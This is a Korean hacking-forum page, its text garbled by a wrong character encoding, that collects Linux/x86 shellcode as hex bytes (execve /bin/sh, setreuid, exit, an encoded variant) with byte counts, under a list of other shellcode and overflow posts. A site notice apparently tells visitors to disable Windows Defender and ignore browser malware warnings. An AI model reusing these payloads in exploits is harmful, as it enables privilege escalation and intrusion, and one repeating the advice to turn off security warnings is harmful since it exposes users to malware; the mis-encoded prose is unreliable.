ÇØÄ¿Áî´º½º / ÇØÄ¿´ëÇÐ

Donation bitcoin(±âºÎ¿ë ºñÆ®ÄÚÀÎ ÁÖ¼Ò)

¡¡
1Pq3K39XM5xx4CifGKgppXeavtWNNHH7K4
¡¡
±âºÎÇϽŠºñÆ®ÄÚÀÎÀº "º¸¾È Ãë¾à °èÃþ"À» À§ÇØ »ç¿ëµÇ°í ÀÖ½À´Ï´Ù.
¡¡
¡¡

Donation bitcoin(±âºÎ¿ë ºñÆ®ÄÚÀÎ ÁÖ¼Ò)

¡¡
1Pq3K39XM5xx4CifGKgppXeavtWNNHH7K4
¡¡
±âºÎÇϽŠºñÆ®ÄÚÀÎÀº "º¸¾È Ãë¾à °èÃþ"À» À§ÇØ »ç¿ëµÇ°í ÀÖ½À´Ï´Ù.
¡¡

°øÁö

¡¡

1. MS ¿§Áö ºê¶ó¿ìÀú¿¡¼­ÀÇ °æ°íâÀº 'À©µµ¿ì µðÆæ´õ'¸¦ ²ô½Ã¸é µË´Ï´Ù.

             'À©µµ¿ì µðÆæ´õ ²ô±â'

2. Å©·Ò ºê¶ó¿ìÀú·Î Á¢¼Ó½Ã ³ª¿À´Â ¾Ç¼ºÄÚµå °æ°íâÀº ±¸±Û Å©·ÒÀÇ ¿¡·¯, Áï ¿ÀŽ(ŽÁö ¿À·ù)À̹ǷΠ¹«½ÃÇÏ½Ã¸é µË´Ï´Ù.

3. ÀÌ »çÀÌÆ®´Â ¾ÈÀüÇÏ¸ç ±ú²ýÇÏ´Ù´Â °ÍÀ» ¾Ë·Á µå¸³´Ï´Ù.

4. ¹«°íÇÑ »çÀÌÆ®µé¿¡ ´ëÇÑ °ø·æ ±â¾÷ ºê¶ó¿ìÀúµéÀÇ ¹«Â÷º°ÀûÀÎ 'ŽÁö ¿À·ù ȾÆ÷'°¡ »ç¿ëÀÚµéÀÇ Á¤º¸ °øÀ¯ÀÇ ÀÚÀ¯¸¦ ħÇØÇÏ°í ÀÖ½À´Ï´Ù. ÀÌ¿¡ ´ëÀÀÇÏ¿© ÀÌ ±â¾÷µéÀ» »ó´ë·Î ¼Ò¼ÛÀ» ÁغñÇÏ°í ÀÖ½À´Ï´Ù.

¡¡

Ãâó: ±èÁøÅÃ
À帣: ½©ÄÚµå
À¯¿ëÇÑ ½©ÄÚµå ¸ðÀ½  
0x01. °¡Àå ±âº»ÀûÀ¸·Î ½©À» ¶ç¿ì´Â ÄÚµå

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89

\xe1\x89\xc2\xb0\x0b\xcd\x80

bytes : 25

¹ÌÆ÷ÇÔ : setreuid(), exit()




0x02. ½©À» Á¾·áÇÒ ¶§ exit(0)À¸·Î Á¤»óÁ¾·á±îÁö ½ÃÄÑÁÖ´Â ÄÚµå

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80

\x31\xc0\xb0\x01\xcd\x80

bytes : 31

¹ÌÆ÷ÇÔ : setreuid()




0x03. setreuid(geteuid(), getreuid()), exit(0) ±îÁö Æ÷ÇÔ½ÃŲ ½© ÄÚµå

\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80

bytes : 47




0x04. exit(0) ÄÚµå

\x31\xc0\xb0\x01\xcd\x80

bytes : 6




0x05. setreuid(geteuid(), geteuid()) ÄÚµå

\x31\xc0\xb0\x31\xcd\x80\x89\xc3\x89\xc1\x31\xc0\xb0\x46\xcd\x80

bytes : 16




Linux/x86 execve /bin/sh shellcode 23 bytes

\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80




linux x86 ÆÄÀϸí shellcode 48byte

\xeb\x11\x5e\x31\xc9\xb1\x32\x80\x6c\x0e\xff\x01\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\x32\xc1\x51\x69\x30\x30\x74\x69\x69\x30\x63\x6a\x6f\x8a\xe4\x51\x54\x8a\xe2\x9a\xb1\x0c\xce\x81





                    ´äº¯/°ü·Ã ¾²±â ¼öÁ¤/»èÁ¦     ÀÌÀü±Û ´ÙÀ½±Û    
¹®¼­¹øÈ£À帣¹®¼­¸íÃâó÷ºÎ
     ÀÌ°÷¿¡¼­´Â ¹öÆÛ¿À¹öÇ÷οì¿Í Æ÷¸Ë½ºÆ®¸µ ¹ö±×¿¡ ´ëÇÑ ¹®¼­µéÀ» Á¦°øÇÕ´Ï´Ù.
94 BSS/ABI    BSS¿Í ABI ±èÁøÅà  
93 ½©ÄÚµå    À¯¿ëÇÑ ½©ÄÚµå ¸ðÀ½ ±èÁøÅà  
92 XSS    XSS È¿À²ÀûÀÎ ¹æ¾î¹ý 3°¡Áö Á¶ÅÂÇü  
91 ¹öÆÛ¿À¹öÇÃ·Î¿ì    ¿À¹öÇÃ·Î¿ì °ø°Ý°ú ¹æ¾î ±èÁøÅà   
90 ½©ÄÚµå    Linux/x86 chroot and standart shellcode Okti  
89 ¹öÆÛ¿À¹öÇÃ·Î¿ì    Àß ¸¸µé¾îÁø ¹öÆÛ¿À¹öÇÃ·Î¿ì ¹®¼­ ¹Ì»ó  
88 ½©ÄÚµå    ³×Æ®¿öÅ© ½©ÄÚµå ¸¸µé±â À̵¿¿ì  
87 ½©ÄÚµå    ¼Ö¶ó¸®½º ¹ÙÀεù ½©ÄÚµå truefinder,  
86 ½©ÄÚµå    bin À» 16Áø¼ö·Î º¯È¯ÇÏ´Â Åø ÇØÄ¿Áî´º½º   
85 ½©ÄÚµå    ½©ÄÚµå »ý¼º±â ÇØÄ¿Áî´º½º   
84 ½©ÄÚµå    FTP ¿ø°Ý ´Ù¿î·Îµå/½ÇÇà ¹ÙÀεù Matt Conover  
83 ½©ÄÚµå    TCP ¹ÙÀεù ½©ÄÚµå Matt Conover   

 
´ÙÀ½       ¸ñ·Ï ¾²±â